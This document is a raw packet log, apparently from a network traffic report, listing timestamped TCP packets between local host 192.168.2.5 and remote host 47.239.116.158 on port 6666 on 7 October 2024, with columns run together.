                                                                                                            Oct 7, 2024 06:39:19.297255993 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.297257900 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297349930 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.297941923 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297991991 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.298024893 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.298053026 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.298057079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.298091888 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.298098087 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.440067053 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.512742043 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.512803078 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.512866974 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.512872934 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.512907028 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.512942076 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.512957096 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.512974977 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513010025 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513041973 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513056993 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513075113 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513108969 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513118029 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513140917 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513154030 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513174057 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513217926 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513221025 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513253927 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513289928 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513293982 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513597012 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513652086 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513685942 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513711929 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513727903 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513737917 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513771057 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513803959 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513837099 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513851881 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513870001 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513902903 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513910055 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513935089 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.513943911 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.513969898 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514023066 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.514437914 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514471054 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514523029 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514554977 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514570951 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.514605999 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514640093 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514653921 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.514672995 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514681101 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.514704943 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514736891 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514750004 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.514770031 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514805079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.514813900 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.515443087 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515492916 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515526056 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515549898 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.515578032 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515611887 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515620947 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.515644073 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515652895 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.515676975 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515708923 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515723944 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.515741110 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515774012 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.515782118 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.515806913 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516283035 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516328096 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.516336918 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516371965 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516417980 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.516422987 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516454935 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516463995 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.516488075 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516520977 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.516530037 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.599513054 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.599616051 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.730489969 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730555058 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730590105 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730643988 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730640888 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.730699062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730710983 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.730736971 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730771065 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730804920 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730811119 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.730853081 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.730856895 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730890989 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730941057 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730973959 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.730988979 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731028080 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731036901 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731087923 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731122017 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731153965 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731193066 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731193066 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731193066 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731245041 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731278896 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731287956 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731312990 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731345892 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731369972 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731380939 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731452942 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731484890 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731498003 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731518030 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731550932 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731559992 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731590033 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731616974 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731643915 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731695890 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731729031 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731753111 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731764078 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731775045 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731797934 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731831074 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731858015 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731882095 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731919050 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731929064 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.731952906 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.731985092 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732017040 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732029915 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732049942 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732085943 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732103109 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732120037 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732130051 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732155085 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732188940 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732197046 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732222080 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732269049 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732508898 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732561111 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732594013 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732625008 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732640982 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732660055 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732693911 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732706070 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732736111 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732747078 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732783079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732815981 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732847929 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732857943 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732882023 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732909918 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732916117 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732949018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.732969999 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.732983112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733016014 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733051062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733073950 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733159065 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733386040 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733438969 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733472109 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733504057 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733525038 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733556986 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733612061 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733618021 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733663082 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733695984 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733711004 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733743906 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733766079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733798981 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733831882 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733865976 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733874083 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733899117 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733906984 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733933926 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733967066 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733978987 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734004021 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734090090 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734421968 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734474897 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734508991 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734541893 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734545946 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734575987 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734610081 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734623909 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734647036 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734680891 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734692097 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734744072 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948117018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948184013 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948215008 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948254108 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948276043 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948333025 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948338985 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948386908 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948440075 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948489904 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948523045 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948523045 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948550940 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948575020 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948612928 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948646069 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948662996 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948715925 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948729038 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948751926 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948785067 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948805094 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948817015 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948862076 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948870897 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948904991 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948956013 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948991060 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948995113 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949024916 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949039936 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949090004 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949139118 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949141026 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949176073 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949208975 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949239969 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949244976 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949276924 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949311018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949337006 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949362040 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949366093 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949420929 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949472904 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949481964 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949506998 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949539900 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949568987 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949573040 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949624062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949656963 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949678898 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949692011 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949701071 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949731112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949764967 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949796915 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949810982 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949831009 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949862957 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949876070 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949898958 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949930906 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949934959 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949965954 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949996948 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949997902 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.950028896 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950059891 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.950062037 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950094938 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950128078 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950143099 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.950162888 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950172901 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:20.033807039 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.029534101 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.034552097 CEST66664976747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:22.034625053 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.036827087 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.041698933 CEST66664976747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:22.930978060 CEST66664976747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:23.018440008 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:23.991892099 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:23.996829033 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:23.996916056 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:25.810719013 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:25.815798998 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.815835953 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.815864086 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.815933943 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.971716881 CEST497676666192.168.2.547.239.116.158
